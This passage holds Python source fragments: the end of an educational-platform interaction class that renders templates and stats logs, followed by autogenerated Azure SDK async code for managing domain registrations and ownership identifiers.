return self.__class__.__name__
@property
def customization_arg_specs(self):
return [
domain.CustomizationArgSpec(**cas)
for cas in self._customization_arg_specs]
@property
def dependency_ids(self):
return copy.deepcopy(self._dependency_ids)
@property
def rules(self):
return rule_domain.get_rules_for_obj_type(self.answer_type)
def normalize_answer(self, answer):
"""Normalizes a learner's input to this interaction."""
if self.answer_type:
return obj_services.Registry.get_object_class_by_type(
self.answer_type).normalize(answer)
raise Exception(
'No answer type initialized for interaction %s' % self.name)
@property
def _stats_log_template(self):
"""The template for reader responses in the stats log."""
try:
return utils.get_file_contents(os.path.join(
feconf.INTERACTIONS_DIR, self.id, 'stats_response.html'))
except IOError:
return '{{answer}}'
@property
def html_body(self):
"""The HTML code containing directives and templates for the
interaction. This contains everything needed to display the interaction
once the necessary attributes are supplied.
Each interaction has two directive/template pairs, one for the
interaction itself and the other for displaying the learner's response
in a read-only view after it has been submitted.
"""
js_directives = utils.get_file_contents(os.path.join(
feconf.INTERACTIONS_DIR, self.id, '%s.js' % self.id))
html_templates = utils.get_file_contents(os.path.join(
feconf.INTERACTIONS_DIR, self.id, '%s.html' % self.id))
return '<script>%s</script>\n%s' % (js_directives, html_templates)
@property
def validator_html(self):
"""The HTML code containing validators for the interaction's
customization_args and submission handler.
"""
return (
'<script>%s</script>\n' %
utils.get_file_contents(os.path.join(
feconf.INTERACTIONS_DIR, self.id, 'validator.js')))
def to_dict(self):
"""Gets a dict representing this interaction. Only default values are
provided.
"""
result = {
'id': self.id,
'name': self.name,
'description': self.description,
'display_mode': self.display_mode,
'is_terminal': self.is_terminal,
'is_trainable': self.is_trainable,
'needs_summary': self.needs_summary,
'customization_arg_specs': [{
'name': ca_spec.name,
'description': ca_spec.description,
'default_value': ca_spec.default_value,
'schema': ca_spec.schema,
} for ca_spec in self.customization_arg_specs],
'instructions': self.instructions,
}
# Add information about rule descriptions corresponding to the answer
# type for this interaction.
result['rule_descriptions'] = (
rule_domain.get_description_strings_for_obj_type(
self.answer_type))
return result
def get_rule_by_name(self, rule_name):
"""Gets a rule given its name."""
try:
return next(
r for r in self.rules if r.__name__ == rule_name)
except StopIteration:
raise Exception('Could not find rule with name %s' % rule_name)
def get_stats_log_html(self, state_customization_args, answer):
"""Gets the HTML for recording a learner's response in the stats log.
Returns an HTML string.
"""
customization_args = {
ca_spec.name: (
state_customization_args[ca_spec.name]['value']
if ca_spec.name in state_customization_args
else ca_spec.default_value
) for ca_spec in self.customization_arg_specs
}
customization_args['answer'] = answer
return jinja_utils.parse_string(
self._stats_log_template, customization_args, autoescape=False)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._domains_operations import build_check_availability_request, build_create_or_update_ownership_identifier_request, build_create_or_update_request_initial, build_delete_ownership_identifier_request, build_delete_request, build_get_control_center_sso_request_request, build_get_ownership_identifier_request, build_get_request, build_list_by_resource_group_request, build_list_ownership_identifiers_request, build_list_recommendations_request, build_list_request, build_renew_request, build_update_ownership_identifier_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DomainsOperations:
"""DomainsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2018_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def check_availability(
self,
identifier: "_models.NameIdentifier",
**kwargs: Any
) -> "_models.DomainAvailablilityCheckResult":
"""Check if a domain is available for registration.
Check if a domain is available for registration.
:param identifier: Name of the domain.
:type identifier: ~azure.mgmt.web.v2018_02_01.models.NameIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainAvailablilityCheckResult, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.DomainAvailablilityCheckResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainAvailablilityCheckResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(identifier, 'NameIdentifier')
request = build_check_availability_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.check_availability.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainAvailablilityCheckResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/checkDomainAvailability'} # type: ignore
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.DomainCollection"]:
"""Get all domains in a subscription.
Get all domains in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainCollection or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.DomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/domains'} # type: ignore
@distributed_trace_async
async def get_control_center_sso_request(
self,
**kwargs: Any
) -> "_models.DomainControlCenterSsoRequest":
"""Generate a single sign-on request for the domain management portal.
Generate a single sign-on request for the domain management portal.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainControlCenterSsoRequest, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.DomainControlCenterSsoRequest
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainControlCenterSsoRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_control_center_sso_request_request(
subscription_id=self._config.subscription_id,
template_url=self.get_control_center_sso_request.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainControlCenterSsoRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_control_center_sso_request.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/generateSsoRequest'} # type: ignore
@distributed_trace
def list_recommendations(
self,
parameters: "_models.DomainRecommendationSearchParameters",
**kwargs: Any
) -> AsyncIterable["_models.NameIdentifierCollection"]:
"""Get domain name recommendations based on keywords.
Get domain name recommendations based on keywords.
:param parameters: Search parameters for domain name recommendations.
:type parameters: ~azure.mgmt.web.v2018_02_01.models.DomainRecommendationSearchParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NameIdentifierCollection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.NameIdentifierCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NameIdentifierCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
request = build_list_recommendations_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.list_recommendations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
_json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
request = build_list_recommendations_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("NameIdentifierCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_recommendations.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/listDomainRecommendations'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DomainCollection"]:
"""Get all domains in a resource group.
Get all domains in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainCollection or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.DomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> "_models.Domain":
"""Get a domain.
Get a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.Domain",
**kwargs: Any
) -> "_models.Domain":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain, 'Domain')
request = build_create_or_update_request_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Domain', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.Domain",
**kwargs: Any
) -> AsyncLROPoller["_models.Domain"]:
"""Creates or updates a domain.
Creates or updates a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param domain: Domain registration information.
:type domain: ~azure.mgmt.web.v2018_02_01.models.Domain
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Domain or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.web.v2018_02_01.models.Domain]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
domain=domain,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
domain_name: str,
force_hard_delete_domain: Optional[bool] = None,
**kwargs: Any
) -> None:
"""Delete a domain.
Delete a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param force_hard_delete_domain: Specify :code:`<code>true</code>` to delete the domain
immediately. The default is :code:`<code>false</code>` which deletes the domain after 24 hours.
:type force_hard_delete_domain: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
force_hard_delete_domain=force_hard_delete_domain,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def update(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.DomainPatchResource",
**kwargs: Any
) -> "_models.Domain":
"""Creates or updates a domain.
Creates or updates a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param domain: Domain registration information.
:type domain: ~azure.mgmt.web.v2018_02_01.models.DomainPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain, 'DomainPatchResource')
request = build_update_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Domain', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace
def list_ownership_identifiers(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DomainOwnershipIdentifierCollection"]:
"""Lists domain ownership identifiers.
Lists domain ownership identifiers.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainOwnershipIdentifierCollection or the result
of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifierCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifierCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_ownership_identifiers_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.list_ownership_identifiers.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_ownership_identifiers_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainOwnershipIdentifierCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_ownership_identifiers.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers'} # type: ignore
@distributed_trace_async
async def get_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Get ownership identifier for domain.
Get ownership identifier for domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
template_url=self.get_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def create_or_update_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:param domain_ownership_identifier: A JSON representation of the domain ownership properties.
:type domain_ownership_identifier: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
request = build_create_or_update_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def delete_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
**kwargs: Any
) -> None:
"""Delete ownership identifier for domain.
Delete ownership identifier for domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
template_url=self.delete_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def update_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
